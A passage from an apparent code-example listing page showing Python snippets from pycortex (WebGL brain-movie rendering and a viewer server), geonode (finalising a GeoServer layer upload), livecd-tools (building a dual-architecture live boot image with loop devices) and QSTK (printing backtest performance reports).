                Size (in pixels) of resulting movie
            interpolation : {"linear","smoothstep","smootherstep"}
                Interpolation method for values between keyframes.

            Example
            -------
            # Called after a call of the form: js_handle = cortex.webgl.show(DataViewObject)
            # Start with left hemisphere view
            js_handle._setView(azimuth=[90],altitude=[90.5],mix=[0])
            # Initialize list
            animation = []
            # Append 5 key frames for a simple rotation
            for az,idx in zip([90,180,270,360,450],[0,.5,1.0,1.5,2.0]):
                animation.append({'state':'azimuth','idx':idx,'value':[az]})
            # Animate! (use default settings)
            js_handle.makeMovie(animation)
            """
            # build up two variables: State and Anim.
            # state is a dict of all values being modified at any time
            state = dict()
            # anim is a list of transitions between keyframes
            anim = []
            for f in sorted(animation, key=lambda x:x['idx']):
                if f['idx'] == 0:
                    self.setState(f['state'], f['value'])
                    state[f['state']] = dict(idx=f['idx'], val=f['value'])
                else:
                    if f['state'] not in state:
                        state[f['state']] = dict(idx=0, val=self.getState(f['state'])[0])
                    start = dict(idx=state[f['state']]['idx'],
                                 state=f['state'],
                                 value=state[f['state']]['val'])
                    end = dict(idx=f['idx'], state=f['state'], value=f['value'])
                    state[f['state']]['idx'] = f['idx']
                    state[f['state']]['val'] = f['value']
                    if start['value'] != end['value']:
                        anim.append((start, end))

            for i, sec in enumerate(np.arange(0, anim[-1][1]['idx']+1./fps, 1./fps)):
                for start, end in anim:
                    if start['idx'] < sec <= end['idx']:
                        idx = (sec - start['idx']) / float(end['idx'] - start['idx'])
                        if start['state'] == 'frame':
                            func = mixes['linear']
                        else:
                            func = mixes[interpolation]

                        val = func(np.array(start['value']), np.array(end['value']), idx)
                        if isinstance(val, np.ndarray):
                            self.setState(start['state'], val.ravel().tolist())
                        else:
                            self.setState(start['state'], val)
                self.saveIMG(filename%(i+offset), size=size)

        def _get_anim_seq(self,keyframes,fps=30,interpolation='linear'):
            """Convert a list of keyframes to a list of EVERY frame in an animation.

            Utility function called by make_movie; separated out so that individual
            frames of an animation can be re-rendered, or for more control over the
            animation process in general.

            """
            # Misc. setup
            fr = 0
            a = np.array
            func = mixes[interpolation]
            skip_props = ['projection','visR','visL',]
            # Get keyframes
            keyframes = sorted(keyframes, key=lambda x:x['time'])
            # Normalize all time to frame rate
            fs = 1./fps
            for k in range(len(keyframes)):
                t = keyframes[k]['time']
                t = np.round(t/fs)*fs
                keyframes[k]['time'] = t
            allframes = []
            for start,end in zip(keyframes[:-1],keyframes[1:]):
                t0 = start['time']
                t1 = end['time']
                tdif = float(t1-t0)
                # Check whether to continue frame sequence to endpoint
                use_endpoint = keyframes[-1]==end
                nvalues = np.round(tdif/fs)
                if use_endpoint:
                    nvalues +=1
                fr_time = np.linspace(0,1,nvalues,endpoint=use_endpoint)
                # Interpolate between values
                for t in fr_time:
                    frame = {}
                    for prop in start.keys():
                        if prop=='time':
                            continue
                        if (prop in skip_props) or (start[prop][0] is None):
                            frame[prop] = start[prop]
                            continue
                        val = func(a(start[prop]), a(end[prop]), t)
                        if isinstance(val, np.ndarray):
                            frame[prop] = val.tolist()
                        else:
                            frame[prop] = val
                    allframes.append(frame)
            return allframes

        def make_movie_views(self, animation, filename="brainmovie%07d.png", offset=0,
                      fps=30, size=(1920, 1080), interpolation="linear"):
            """Renders movie frames for animation of mesh movement

            Makes an animation (for example, a transition between inflated and
            flattened brain or a rotating brain) of a cortical surface. Takes a
            list of dictionaries (`animation`) as input, and uses the values in
            the dictionaries as keyframes for the animation.

            Mesh display parameters that can be animated include 'elevation',
            'azimuth','mix','radius','target' (more?)


            Parameters
            ----------
            animation : list of dicts
                This is a list of keyframes for the animation. Each keyframe should be
                a dict in the form captured by the ._capture_view method. NOTE: every
                view must include all view parameters. Additionally, there should be
                one extra key/value pair for "time". The value for time should be
                in seconds. The list of keyframes is sorted by time before applying,
                so they need not be in order in the input.
            filename : string path name
                Must contain '%d' (or some variant thereof) to account for frame
                number, e.g. '/some/directory/brainmovie%07d.png'
            offset : int
                Frame number for first frame rendered. Useful for concatenating
                animations.
            fps : int
                Frame rate of resultant movie
            size : tuple (x,y)
                Size (in pixels) of resulting movie
            interpolation : {"linear","smoothstep","smootherstep"}
                Interpolation method for values between keyframes.

            Notes
            -----
            Make sure that all values that will be modified over the course
            of the animation are initialized (have some starting value) in the first
            frame.

            Example
            -------
            # Called after a call of the form: js_handle = cortex.webgl.show(DataViewObject)
            # Start with left hemisphere view
            js_handle._setView(azimuth=[90],altitude=[90.5],mix=[0])
            # Initialize list
            animation = []
            # Append 5 key frames for a simple rotation
            for az,t in zip([90,180,270,360,450],[0,.5,1.0,1.5,2.0]):
                animation.append({'time':t,'azimuth':[az]})
            # Animate! (use default settings)
            js_handle.make_movie(animation)
            """
            import time
            allframes = self._get_anim_seq(animation,fps,interpolation)
            for fr,frame in enumerate(allframes):
                self._set_view(**frame)
                self.saveIMG(filename%(fr+offset+1), size=size)
                time.sleep(.01)

    class PickerHandler(web.RequestHandler):
        def get(self):
            pickerfun(int(self.get_argument("voxel")), int(self.get_argument("vertex")))

    class WebApp(serve.WebApp):
        disconnect_on_close = autoclose
        def get_client(self):
            self.connect.wait()
            self.connect.clear()
            return JSMixer(self.send, "window.viewers")

        def get_local_client(self):
            return JSMixer(self.srvsend, "window.viewers")

    if port is None:
        port = random.randint(1024, 65536)

    server = WebApp([
            (r'/ctm/(.*)', CTMHandler),
            (r'/data/(.*)', DataHandler),
            (r'/stim/(.*)', StimHandler),
            (r'/'+template, MixerHandler),
            (r'/picker', PickerHandler),
            (r'/', MixerHandler),
            (r'/static/(.*)', StaticHandler),
        ], port)
    server.start()
    print("Started server on port %d"%server.port)
    if open_browser:
        webbrowser.open("http://%s:%d/%s"%(serve.hostname, server.port, template))
        client = server.get_client()
        client.server = server
        return client
    else:
        try:
            from IPython.display import display, HTML
            link = "http://%s:%d/%s" % (serve.hostname, server.port, template)
            display(HTML('Open viewer: <a href="{0}" target="_blank">{0}</a>'.format(link)))
        except:
            pass
        return server

Example 112

Project: geonode
Source File: upload.py
View license
def final_step(upload_session, user):
    from geonode.geoserver.helpers import get_sld_for
    import_session = upload_session.import_session
    _log('Reloading session %s to check validity', import_session.id)
    import_session = import_session.reload()
    upload_session.import_session = import_session

    # the importer chooses an available featuretype name late in the game need
    # to verify the resource.name otherwise things will fail.  This happens
    # when the same data is uploaded a second time and the default name is
    # chosen

    cat = gs_catalog
    cat._cache.clear()

    # Create the style and assign it to the created resource
    # FIXME: Put this in gsconfig.py

    task = import_session.tasks[0]

    # @todo see above in save_step, regarding computed unique name
    name = task.layer.name

    _log('Getting from catalog [%s]', name)
    publishing = cat.get_layer(name)

    if import_session.state == 'INCOMPLETE':
        if task.state != 'ERROR':
            raise Exception('unknown item state: %s' % task.state)
    elif import_session.state == 'PENDING':
        if task.state == 'READY' and task.data.format != 'Shapefile':
            import_session.commit()

    if not publishing:
        raise LayerNotReady("Expected to find layer named '%s' in geoserver" % name)

    _log('Creating style for [%s]', name)
    # get_files will not find the sld if it doesn't match the base name
    # so we've worked around that in the view - if provided, it will be here
    if upload_session.import_sld_file:
        _log('using provided sld file')
        base_file = upload_session.base_file
        sld_file = base_file[0].sld_files[0]

        f = open(sld_file, 'r')
        sld = f.read()
        f.close()
    else:
        sld = get_sld_for(publishing)

    style = None
    print " **************************************** "
    if sld is not None:
        try:
            cat.create_style(name, sld)
            style = cat.get_style(name)
        except geoserver.catalog.ConflictingDataError as e:
            msg = 'There was already a style named %s in GeoServer, try using another name: "%s"' % (
                name, str(e))
            try:
                cat.create_style(name + '_layer', sld)
                style = cat.get_style(name + '_layer')
            except geoserver.catalog.ConflictingDataError as e:
                msg = 'There was already a style named %s in GeoServer, cannot overwrite: "%s"' % (
                    name, str(e))
                logger.error(msg)
                e.args = (msg,)

                # what are we doing with this var?
                msg = 'No style could be created for the layer, falling back to POINT default one'
                style = cat.get_style('point')
                logger.warn(msg)
                e.args = (msg,)

        # FIXME: Should we use the fully qualified typename?
        publishing.default_style = style
        _log('default style set to %s', name)
        cat.save(publishing)

    _log('Creating Django record for [%s]', name)
    target = task.target
    typename = task.get_target_layer_name()
    layer_uuid = str(uuid.uuid1())

    title = upload_session.layer_title
    abstract = upload_session.layer_abstract

    # @todo hacking - any cached layers might cause problems (maybe
    # delete hook on layer should fix this?)
    cat._cache.clear()

    # Is it a regular file or an ImageMosaic?
    # if upload_session.mosaic_time_regex and upload_session.mosaic_time_value:
    if upload_session.mosaic:

        import pytz
        import datetime
        from geonode.layers.models import TIME_REGEX_FORMAT

        # llbbox = publishing.resource.latlon_bbox
        start = None
        end = None
        if upload_session.mosaic_time_regex and upload_session.mosaic_time_value:
            has_time = True
            start = datetime.datetime.strptime(upload_session.mosaic_time_value,
                                               TIME_REGEX_FORMAT[upload_session.mosaic_time_regex])
            start = pytz.utc.localize(start, is_dst=False)
            end = start
        else:
            has_time = False

        if not upload_session.append_to_mosaic_opts:
            saved_layer, created = Layer.objects.get_or_create(
                name=task.layer.name,
                defaults=dict(store=target.name,
                              storeType=target.store_type,
                              typename=typename,
                              workspace=target.workspace_name,
                              title=title,
                              uuid=layer_uuid,
                              abstract=abstract or '',
                              owner=user,),
                temporal_extent_start=start,
                temporal_extent_end=end,
                is_mosaic=True,
                has_time=has_time,
                has_elevation=False,
                time_regex=upload_session.mosaic_time_regex
            )
        else:
            # saved_layer = Layer.objects.filter(name=upload_session.append_to_mosaic_name)
            # created = False
            saved_layer, created = Layer.objects.get_or_create(name=upload_session.append_to_mosaic_name)
            try:
                if saved_layer.temporal_extent_start and end:
                    if pytz.utc.localize(saved_layer.temporal_extent_start, is_dst=False) < end:
                        saved_layer.temporal_extent_end = end
                        Layer.objects.filter(name=upload_session.append_to_mosaic_name).update(
                            temporal_extent_end=end)
                    else:
                        saved_layer.temporal_extent_start = end
                        Layer.objects.filter(name=upload_session.append_to_mosaic_name).update(
                            temporal_extent_start=end)
            except Exception as e:
                _log('There was an error updating the mosaic temporal extent: ' + str(e))
    else:
        saved_layer, created = Layer.objects.get_or_create(
            name=task.layer.name,
            defaults=dict(store=target.name,
                          storeType=target.store_type,
                          typename=typename,
                          workspace=target.workspace_name,
                          title=title,
                          uuid=layer_uuid,
                          abstract=abstract or '',
                          owner=user,)
        )

    # Should we throw a clearer error here?
    assert saved_layer is not None

    # @todo if layer was not created, need to ensure upload target is
    # same as existing target

    _log('layer was created : %s', created)

    if created:
        saved_layer.set_default_permissions()

    # Create the points of contact records for the layer
    _log('Creating points of contact records for [%s]', name)
    saved_layer.poc = user
    saved_layer.metadata_author = user

    # look for xml
    xml_file = upload_session.base_file[0].xml_files
    if xml_file:
        saved_layer.metadata_uploaded = True
        # get model properties from XML
        identifier, vals, regions, keywords = set_metadata(open(xml_file[0]).read())

        regions_resolved, regions_unresolved = resolve_regions(regions)
        keywords.extend(regions_unresolved)

        # set regions
        regions_resolved = list(set(regions_resolved))
        if regions:
            if len(regions) > 0:
                saved_layer.regions.add(*regions_resolved)

        # set taggit keywords
        keywords = list(set(keywords))
        saved_layer.keywords.add(*keywords)

        # set model properties
        for (key, value) in vals.items():
            if key == "spatial_representation_type":
                # value = SpatialRepresentationType.objects.get(identifier=value)
                pass
            else:
                setattr(saved_layer, key, value)

        saved_layer.save()

    # Set default permissions on the newly created layer
    # FIXME: Do this as part of the post_save hook

    permissions = upload_session.permissions
    if created and permissions is not None:
        _log('Setting default permissions for [%s]', name)
        saved_layer.set_permissions(permissions)

    if upload_session.tempdir and os.path.exists(upload_session.tempdir):
        shutil.rmtree(upload_session.tempdir)

    upload = Upload.objects.get(import_id=import_session.id)
    upload.layer = saved_layer
    upload.complete = True
    upload.save()

    if upload_session.time_info:
        set_time_info(saved_layer, **upload_session.time_info)

    signals.upload_complete.send(sender=final_step, layer=saved_layer)

    return saved_layer

Example 113

Project: livecd-tools
Source File: mkbiarch.py
View license
def main():


    def usage():
        usage = 'usage: mkbiarch.py <x86 Live ISO File> <x64 Live ISO File> <Target Multi Arch Image File>'
        print >> sys.stdout, usage


    def mount(src, dst, options=None):
        if os.path.exists(src):
            if not os.path.exists(dst):
                os.makedir(dst)
            if options is None:
                args = ("/bin/mount", src, dst)
            else:
                args = ("/bin/mount", options, src, dst)
            rc = subprocess.call(args)
            return rc
        return


    def umount(src):
        if os.path.exists(src):
                args = ("/bin/umount", src)
                rc = subprocess.call(args)
                return rc
        return


    def copy(src, dst):
        if os.path.exists(src):
            if not os.path.exists(dst):
                if not os.path.isfile(src):
                    mkdir(dst)
            shutil.copy(src, dst)


    def move(src, dst):
        if os.path.exists(src):
            shutil.move(src, dst)

    def mkdir(dir=None):
        if dir is None:
            tmp = tempfile.mkdtemp()
            return tmp
        else:
            args = ("/bin/mkdir", "-p", dir)
            rc = subprocess.call(args)


    def losetup(src, dst, offset=None):
        if os.path.exists(src):
            if os.path.exists(dst):
                if offset is None:
                    args = ("/sbin/losetup", src, dst)
                else:
                    args = ("/sbin/losetup", "-o", str(offset), src, dst)
                rc = subprocess.call(args)
        return rc

    def lounset(device):
        args = ("/sbin/losetup", "-d", device)
        rc = subprocess.call(args) 

    def null():
        fd = open(os.devnull, 'w')
        return fd

    def dd(file, target):
        args = ("/bin/dd", "if=%s"%file, "of=%s"%target)
        rc = subprocess.call(args)

    def lo():
        args = ("/sbin/losetup", "--find")
        rc = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()[0].rstrip()
        return rc

    def lodev(file):
        args = ("/sbin/losetup", "-j", file)
        rc = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()[0].split(":")
        return rc[0]


    def mkimage(bs, count):
        tmp = tempfile.mkstemp()
        image = tmp[1]
        args = ("/bin/dd", "if=/dev/zero",
                 "of=%s"%image, "bs=%s"%bs,
                 "count=%s"%count)
        rc = subprocess.call(args)
        return image


    def size(ent):
        if os.path.exists(ent):
            return os.stat(ent).st_size

    def bs(size):
        return size / 2048

    def partition(device):
        dev = parted.Device(path=device)
        disk = parted.freshDisk(dev, 'msdos')
        constraint = parted.Constraint(device=dev)

        new_geom = parted.Geometry(device=dev,
                                   start=1,
                                   end=(constraint.maxSize - 1))
        filesystem = parted.FileSystem(type="ext2",
                                       geometry=new_geom)
        partition = parted.Partition(disk=disk,
                                     fs=filesystem,
                                     type=parted.PARTITION_NORMAL,
                                     geometry=new_geom)
        constraint = parted.Constraint(exactGeom=new_geom)
        partition.setFlag(parted.PARTITION_BOOT)
        disk.addPartition(partition=partition,
                          constraint=constraint)
        
        disk.commit()

    def format(partition):
        args = ("/sbin/mke2fs", "-j", partition)
        rc = subprocess.call(args)

    def mbr(target):
        mbr = "/usr/share/syslinux/mbr.bin"
        dd(mbr, target)

    def getuuid(device):
        args = ("/sbin/blkid", "-s", "UUID", "-o", "value", device)
        rc = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()[0].rstrip()
        return rc

    def syslinux(multitmp, config, **args):
        arg = ("/sbin/extlinux", "--install", multitmp + "/extlinux/")
        rc = subprocess.call(arg)

        content = """
        default vesamenu.c32
        timeout 100

        menu background splash.jpg
        menu title Welcome to Fedora 13
        menu color border 0 #ffffffff #00000000
        menu color sel 7 #ffffffff #ff000000
        menu color title 0 #ffffffff #00000000
        menu color tabmsg 0 #ffffffff #00000000
        menu color unsel 0 #ffffffff #00000000
        menu color hotsel 0 #ff000000 #ffffffff
        menu color hotkey 7 #ffffffff #ff000000
        menu color timeout_msg 0 #ffffffff #00000000
        menu color timeout 0 #ffffffff #00000000
        menu color cmdline 0 #ffffffff #00000000
        menu hidden
        menu hiddenrow 5

        label Fedora-13-x86
        menu label Fedora-13-x86
        kernel vmlinuz0
        append initrd=initrd0.img root=UUID=%(uuid)s rootfstype=auto ro live_dir=/x86/LiveOS liveimg
        
        label Fedora-13-x64
        menu label Fedora-13-x64
        kernel vmlinuz1
        append initrd=initrd1.img root=UUID=%(uuid)s rootfstype=auto ro live_dir=/x64/LiveOS liveimg
        """ % args
        fd = open(config, 'w')
        fd.write(content)
        fd.close()

    def verify():
        # use md5 module to verify image files
        pass

    def setup(x86, x64, multi):

        sz = size(x86) + size(x64)
        count = bs(sz)
        blsz = str(2048)

        count = count + 102400

        multi = mkimage(blsz, count)    
        losetup(lo(), multi)
 
        mbr(lodev(multi))
        partition(lodev(multi))
 
        lounset(lodev(multi))
     
        losetup(lo(), multi, offset=512)
        format(lodev(multi))

        multitmp = mkdir()
        mount(lodev(multi), multitmp)

        losetup(lo(), x86)
        losetup(lo(), x64)
 
        x86tmp = mkdir()
        x64tmp = mkdir()

        mount(lodev(x86), x86tmp)
        mount(lodev(x64), x64tmp)


        dirs = ("/extlinux/", "/x86/", "/x64/")
        for dir in dirs:
            mkdir(multitmp + dir)
        dirs = ("/x86/", "/x64/")
        for dir in dirs:
            mkdir(multitmp + dir + "/LiveOS/")

        intermediate = tempfile.mkdtemp() # loopdev performance is slow
                                          # copy to here first then back
                                          # to multitmp + dir which is looback also

        imgs = ("squashfs.img", "osmin.img")
        for img in imgs:
            copy(x86tmp + "/LiveOS/" + img, intermediate)
            copy(intermediate + "/" + img, multitmp + "/x86/LiveOS/")
        for img in imgs:
            copy(x64tmp + "/LiveOS/" + img, intermediate)
            copy(intermediate + "/" + img, multitmp + "/x64/LiveOS/")

        for file in os.listdir(x86tmp + "/isolinux/"):
            copy(x86tmp + "/isolinux/" + file, multitmp + "/extlinux/")

        copy(x64tmp + "/isolinux/vmlinuz0", multitmp + "/extlinux/vmlinuz1")
        copy(x64tmp + "/isolinux/initrd0.img", multitmp + "/extlinux/initrd1.img")
            

       
        uuid = getuuid(lodev(multi))

  
        config = (multitmp + "/extlinux/extlinux.conf")
        syslinux(multitmp,
                 config,
                 uuid=uuid)



        umount(x86tmp)
        umount(x64tmp)
        umount(multitmp)

        lounset(lodev(x86))
        lounset(lodev(x64))
        lounset(lodev(multi))

        shutil.rmtree(x86tmp)
        shutil.rmtree(x64tmp)
        shutil.rmtree(multitmp)
        shutil.rmtree(intermediate)   
        


        if os.path.exists(sys.argv[3]):
            os.unlink(sys.argv[3])
        move(multi, sys.argv[3])
 

    def parse(x86, x64, multi):
        for file in x86, x64:
            if os.path.exists(file):
                pass
            else:
                usage()
        if not multi:
            usage()
        setup(x86, x64, multi)





    try: 
        parse(sys.argv[1], sys.argv[2], sys.argv[3])
    except:
        usage()

Example 114

Project: QSTK
Source File: report.py
View license
def print_stats(fund_ts, benchmark, name, lf_dividend_rets=0.0, original="",s_fund_name="Fund",
    s_original_name="Original", d_trading_params="", d_hedge_params="", s_comments="", directory = False,
    leverage = False, s_leverage_name="Leverage", commissions = 0, slippage = 0, borrowcost = 0, ostream = sys.stdout, 
    i_start_cash=1000000, ts_turnover="False"):
    """
    @summary prints stats of a provided fund and benchmark
    @param fund_ts: fund value in pandas timeseries
    @param benchmark: benchmark symbol to compare fund to
    @param name: name to associate with the fund in the report
    @param directory: parameter to specify printing to a directory
    @param leverage: time series to plot with report
    @param commissions: value to print with report
    @param slippage: value to print with report
    @param ostream: stream to print stats to, defaults to stdout
    """

    #Set locale for currency conversions
    locale.setlocale(locale.LC_ALL, '')

    if original != "" and type(original) != type([]):
        original = [original]
        if type(s_original_name) != type([]):
            s_original_name = [s_original_name]

    #make names length independent for alignment
    s_formatted_original_name = []
    for name_temp in s_original_name:
        s_formatted_original_name.append("%15s" % name_temp)
    s_formatted_fund_name = "%15s" % s_fund_name

    fund_ts=fund_ts.fillna(method='pad')
    fund_ts=fund_ts.fillna(method='bfill')
    fund_ts=fund_ts.fillna(1.0)
    if directory != False :
        if not path.exists(directory):
            makedirs(directory)

        sfile = path.join(directory, "report-%s.html" % name )
        splot = "plot-%s.png" % name
        splot_dir =  path.join(directory, splot)
        ostream = open(sfile, "wb")
        ostream.write("<pre>")
        print "writing to ", sfile

        if type(original)==type("str"):
            if type(leverage)!=type(False):
                print_plot(fund_ts, benchmark, name, splot_dir, lf_dividend_rets, leverage=leverage, i_start_cash = i_start_cash, s_leverage_name=s_leverage_name)
            else:
                print_plot(fund_ts, benchmark, name, splot_dir, lf_dividend_rets, i_start_cash = i_start_cash)
        else:
            if type(leverage)!=type(False):
                print_plot([fund_ts, original], benchmark, name, splot_dir, s_original_name, lf_dividend_rets,
                             leverage=leverage, i_start_cash = i_start_cash, s_leverage_name=s_leverage_name)
            else:
                print_plot([fund_ts, original], benchmark, name, splot_dir, s_original_name, lf_dividend_rets, i_start_cash = i_start_cash)

    start_date = fund_ts.index[0].strftime("%m/%d/%Y")
    end_date = fund_ts.index[-1].strftime("%m/%d/%Y")
    ostream.write("Performance Summary for "\
	 + str(path.basename(name)) + " Backtest\n")
    ostream.write("For the dates " + str(start_date) + " to "\
                                       + str(end_date) + "")

    #paramater section
    if d_trading_params!="":
        ostream.write("\n\nTrading Paramaters\n\n")
        for var in d_trading_params:
            print_line(var, d_trading_params[var],ostream=ostream)
    if d_hedge_params!="":
        ostream.write("\nHedging Paramaters\n\n")
        if type(d_hedge_params['Weight of Hedge']) == type(float):
            d_hedge_params['Weight of Hedge'] = str(int(d_hedge_params['Weight of Hedge']*100)) + '%'
        for var in d_hedge_params:
            print_line(var, d_hedge_params[var],ostream=ostream)

    #comment section
    if s_comments!="":
        ostream.write("\nComments\n\n%s" % s_comments)


    if directory != False :
        ostream.write("\n\n<img src="+splot+" width=700 />\n\n")

    mult = i_start_cash/fund_ts.values[0]


    timeofday = dt.timedelta(hours = 16)
    timestamps = du.getNYSEdays(fund_ts.index[0], fund_ts.index[-1], timeofday)
    dataobj =de.DataAccess('mysql')
    years = du.getYears(fund_ts)
    benchmark_close = dataobj.get_data(timestamps, benchmark, ["close"], \
                                                     verbose = False)[0]
    for bench_sym in benchmark:
        benchmark_close[bench_sym]=benchmark_close[bench_sym].fillna(method='pad')
        benchmark_close[bench_sym]=benchmark_close[bench_sym].fillna(method='bfill')
        benchmark_close[bench_sym]=benchmark_close[bench_sym].fillna(1.0)

    if type(lf_dividend_rets) != type(0.0):
        for i,sym in enumerate(benchmark):
            benchmark_close[sym] = _dividend_rets_funds(benchmark_close[sym], lf_dividend_rets[i])

    ostream.write("Resulting Values in $ with an initial investment of "+ locale.currency(int(round(i_start_cash)), grouping=True) + "\n")

    print_line(s_formatted_fund_name+" Resulting Value"," %15s, %10.2f%%" % (locale.currency(int(round(fund_ts.values[-1]*mult)), grouping=True), \
                                                     float(100*((fund_ts.values[-1]/fund_ts.values[0])-1))), i_spacing=4, ostream=ostream)

    # if type(original)!=type("str"):
    #     mult3 = i_start_cash / original.values[0]
    #     # print_line(s_formatted_original_name +" Resulting Value",(locale.currency(int(round(original.values[-1]*mult3)), grouping=True)),i_spacing=3, ostream=ostream)
    #     print_line(s_formatted_original_name+" Resulting Value"," %15s, %10.2f%%" % (locale.currency(int(round(original.values[-1]*mult3)), grouping=True), \
    #                                                  float(100*((original.values[-1]/original.values[0])-1))), i_spacing=4, ostream=ostream)

    if type(original)!=type("str"):
        for i in range(len(original)):
            mult3 = i_start_cash / original[i].values[0]
            # print_line(s_formatted_original_name +" Resulting Value",(locale.currency(int(round(original[i].values[-1]*mult3)), grouping=True)),i_spacing=3, ostream=ostream)
            print_line(s_formatted_original_name[i]+" Resulting Value"," %15s, %10.2f%%" % (locale.currency(int(round(original[i].values[-1]*mult3)), grouping=True), \
                                                     float(100*((original[i].values[-1]/original[i].values[0])-1))), i_spacing=4, ostream=ostream)

    for bench_sym in benchmark:
        mult2= i_start_cash / benchmark_close[bench_sym].values[0]
        # print_line(bench_sym+" Resulting Value",locale.currency(int(round(benchmark_close[bench_sym].values[-1]*mult2)), grouping=True),i_spacing=3, ostream=ostream)
        print_line(bench_sym+" Resulting Value"," %15s, %10.2f%%" % (locale.currency(int(round(benchmark_close[bench_sym].values[-1]*mult2)), grouping=True), \
                                                     float(100*((benchmark_close[bench_sym].values[-1]/benchmark_close[bench_sym].values[0])-1))), i_spacing=4, ostream=ostream)

    ostream.write("\n")

    # if len(years) > 1:
    print_line(s_formatted_fund_name+" Sharpe Ratio","%10.3f" % fu.get_sharpe_ratio(fund_ts.values)[0],i_spacing=4, ostream=ostream)
    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Sharpe Ratio","%10.3f" % fu.get_sharpe_ratio(original[i].values)[0],i_spacing=4, ostream=ostream)

    for bench_sym in benchmark:
        print_line(bench_sym+" Sharpe Ratio","%10.3f" % fu.get_sharpe_ratio(benchmark_close[bench_sym].values)[0],i_spacing=4,ostream=ostream)
    ostream.write("\n")


    # KS - Similarity
    # ks, p = ks_statistic(fund_ts);
    # if ks!= -1 and p!= -1:
    #     if ks < p:
    #         ostream.write("\nThe last three month's returns are consistent with previous performance (KS = %2.5f, p = %2.5f) \n\n"% (ks, p))
    #     else:
    #         ostream.write("\nThe last three month's returns are NOT CONSISTENT with previous performance (KS = %2.5f, p = %2.5f) \n\n"% (ks, p))


    ostream.write("Transaction Costs\n")
    print_line("Total Commissions"," %15s, %10.2f%%" % (locale.currency(int(round(commissions)), grouping=True), \
                                                  float((round(commissions)*100)/(fund_ts.values[-1]*mult))), i_spacing=4, ostream=ostream)

    print_line("Total Slippage"," %15s, %10.2f%%" % (locale.currency(int(round(slippage)), grouping=True), \
                                                     float((round(slippage)*100)/(fund_ts.values[-1]*mult))), i_spacing=4, ostream=ostream)

    print_line("Total Short Borrowing Cost"," %15s, %10.2f%%" % (locale.currency(int(round(borrowcost)), grouping=True), \
                                                     float((round(borrowcost)*100)/(fund_ts.values[-1]*mult))), i_spacing=4, ostream=ostream)

    print_line("Total Costs"," %15s, %10.2f%%" % (locale.currency(int(round(borrowcost+slippage+commissions)), grouping=True), \
                                  float((round(borrowcost+slippage+commissions)*100)/(fund_ts.values[-1]*mult))), i_spacing=4, ostream=ostream)

    ostream.write("\n")

    print_line(s_formatted_fund_name+" Std Dev of Returns",get_std_dev(fund_ts),i_spacing=8, ostream=ostream)

    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Std Dev of Returns", get_std_dev(original[i]), i_spacing=8, ostream=ostream)

    for bench_sym in benchmark:
        print_line(bench_sym+" Std Dev of Returns", get_std_dev(benchmark_close[bench_sym]), i_spacing=8, ostream=ostream)

    ostream.write("\n")


    for bench_sym in benchmark:
        print_benchmark_coer(fund_ts, benchmark_close[bench_sym], str(bench_sym), ostream)
    ostream.write("\n")

    ostream.write("\nYearly Performance Metrics")
    print_years(years, ostream)


    s_line=""
    for f_token in get_annual_return(fund_ts, years):
        s_line+=" %+8.2f%%" % f_token
    print_line(s_formatted_fund_name+" Annualized Return",s_line, i_spacing=4, ostream=ostream)


    if type(original)!=type("str"):
        for i in range(len(original)):
            s_line=""
            for f_token in get_annual_return(original[i], years):
                s_line+=" %+8.2f%%" % f_token
            print_line(s_formatted_original_name[i]+" Annualized Return", s_line, i_spacing=4, ostream=ostream)

    for bench_sym in benchmark:
        s_line=""
        for f_token in get_annual_return(benchmark_close[bench_sym], years):
            s_line+=" %+8.2f%%" % f_token
        print_line(bench_sym+" Annualized Return", s_line, i_spacing=4, ostream=ostream)

    print_years(years, ostream)

    print_line(s_formatted_fund_name+" Winning Days",get_winning_days(fund_ts, years), i_spacing=4, ostream=ostream)


    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Winning Days",get_winning_days(original[i], years), i_spacing=4, ostream=ostream)


    for bench_sym in benchmark:
        print_line(bench_sym+" Winning Days",get_winning_days(benchmark_close[bench_sym], years), i_spacing=4, ostream=ostream)


    print_years(years, ostream)

    print_line(s_formatted_fund_name+" Max Draw Down",get_max_draw_down(fund_ts, years), i_spacing=4, ostream=ostream)

    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Max Draw Down",get_max_draw_down(original[i], years), i_spacing=4, ostream=ostream)


    for bench_sym in benchmark:
        print_line(bench_sym+" Max Draw Down",get_max_draw_down(benchmark_close[bench_sym], years), i_spacing=4, ostream=ostream)


    print_years(years, ostream)


    print_line(s_formatted_fund_name+" Daily Sharpe Ratio",get_daily_sharpe(fund_ts, years), i_spacing=4, ostream=ostream)


    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Daily Sharpe Ratio",get_daily_sharpe(original[i], years), i_spacing=4, ostream=ostream)

    for bench_sym in benchmark:
        print_line(bench_sym+" Daily Sharpe Ratio",get_daily_sharpe(benchmark_close[bench_sym], years), i_spacing=4, ostream=ostream)


    print_years(years, ostream)

    print_line(s_formatted_fund_name+" Daily Sortino Ratio",get_daily_sortino(fund_ts, years), i_spacing=4, ostream=ostream)

    if type(original)!=type("str"):
        for i in range(len(original)):
            print_line(s_formatted_original_name[i]+" Daily Sortino Ratio",get_daily_sortino(original[i], years), i_spacing=4, ostream=ostream)


    for bench_sym in benchmark:
        print_line(bench_sym+" Daily Sortino Ratio",get_daily_sortino(benchmark_close[bench_sym], years), i_spacing=4, ostream=ostream)


    ostream.write("\n\n\nCorrelation and Beta with DJ Industries for the Fund ")

    print_industry_coer(fund_ts,ostream)

    ostream.write("\n\nCorrelation and Beta with Other Indices for the Fund ")

    print_other_coer(fund_ts,ostream)

    ostream.write("\n\n\nMonthly Returns for the Fund %\n")

    print_monthly_returns(fund_ts, years, ostream)

    if type(ts_turnover) != type("False"):
        ostream.write("\n\nMonthly Turnover for the fund\n")
        print_monthly_turnover(fund_ts, years, ts_turnover, ostream)

    ostream.write("\n\n3 Month Kolmogorov-Smirnov 2-Sample Similarity Test\n")

    print_monthly_ks(fund_ts, years, ostream)

    ks, p = ks_statistic(fund_ts);
    if ks!= -1 and p!= -1:
        ostream.write("\nResults for the Similarity Test over last 3 months : (KS = %2.5f, p = %2.5f) \n\n"% (ks, p))

    if directory != False:
        ostream.write("</pre>")

Example 115

Project: mtpy
Source File: ptplot.py
